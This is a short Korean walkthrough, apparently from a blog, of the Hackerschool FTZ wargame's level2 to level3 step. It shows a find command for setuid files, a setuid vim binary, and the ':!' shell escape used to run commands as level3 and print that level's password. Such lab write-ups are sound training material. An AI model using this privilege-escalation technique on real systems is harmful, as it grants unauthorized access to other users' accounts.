해커스쿨 FTZ ( level2 -> level3 ) by ORANG

FTZ_level2

[level2@ftz level2]$ ls hint  public_html  tmp [level2@ftz level2]$ cat hint 텍스트 파일 편집 중 쉘의 명령을 실행시킬 수 있다는데…

 

level1에서 사용했던 방법으로 level3 setuid 권한이 걸린 파일을 찾아보겠습니다.

[level2@ftz level2]$ find / -user level3 -perm +6000 2>/dev/null /usr/bin/editor [level2@ftz level2]$ ls -l /usr/bin/editor -rwsr-x---    1 level3   level2      11651  6월  5 08:44 /usr/bin/editor

 

실행시켜보면.. vim 편집기가 실행되는것을 확인할 수 있습니다.

 

hint의 내용을 참고하면..

 

vim편집기의 기능중 셸 명령을 실행하는 기능을 사용하면 되겠군요!

 

바로 “:! + 명령어” 를 사용하면 됩니다.

 

:! id , :! my-pass 를 입력해 확인해보면..

uid=3003(level3) gid=3002(level2) groups=3002(level2)   Hit ENTER or type command to continue   Level3 Password is "can you fly?".     shell returned 37   Hit ENTER or type command to continue

 

level3의 패스워드가 보이네요ㅎㅎ